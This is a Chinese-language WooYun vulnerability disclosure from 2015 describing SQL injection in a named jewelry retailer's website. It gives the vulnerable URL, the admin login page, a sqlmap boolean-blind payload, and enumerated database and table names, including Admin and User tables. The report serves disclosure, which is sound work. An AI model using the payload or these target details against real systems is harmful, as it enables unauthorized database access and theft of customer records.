漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-094297
漏洞标题:某知名珠宝商城存在sql注入(可脱裤)
相关厂商:某知名珠宝
漏洞作者: 黄泉哥
提交时间:2015-01-28 15:13
修复时间:2015-03-14 15:14
公开时间:2015-03-14 15:14
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-14: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
国内某知名珠宝网站存在sql注入漏洞,可脱裤,导致信息泄露
详细说明:
http://www.dionly.com/jiamengdian/agent.aspx?id=1 漏点
http://ht.dionly.com/Join/login.asp 后台
漏洞证明:
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9456=9456
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] Dionly_CMS
[*] Dionly_CMS_CX
[*] Dionly_PAD
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] risun_DB_432
[*] tempdb
[*] YDX
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9456=9456
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: Dionly_PAD
[45 tables]
+-------------------------+
| Address |
| Admin |
| Admin_Grant |
| Admin_IPRange |
| Admin_Log |
| Agent |
| Agent_Staff |
| Baike |
| Baike_Class |
| Base_Area |
| Base_BankAccount |
| Base_ColorJewel |
| Base_Gold |
| Base_IP |
| Base_Module |
| Base_Pearl |
| Base_Product_CustomType |
| Base_RingSizeRate |
| Base_TinyDiamond |
| Cart |
| Certify |
| Data |
| Diamond |
| Diamond_Temp |
| Diamond_W1 |
| Diamond_WG |
| Document |
| Favorite |
| Flow |
| GoToShop |
| Message |
| MobileProduct |
| News |
| News_Class |
| Order |
| Order_Diamond |
| Order_Fee |
| Order_Memo |
| Order_Product |
| Order_State |
| Parameter |
| Product |
| Recommend |
| User |
| User_ValidCode |
+-------------------------+
未脱裤,物管费已交..
修复方案:
你们比我懂..
版权声明:转载请注明来源 黄泉哥@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝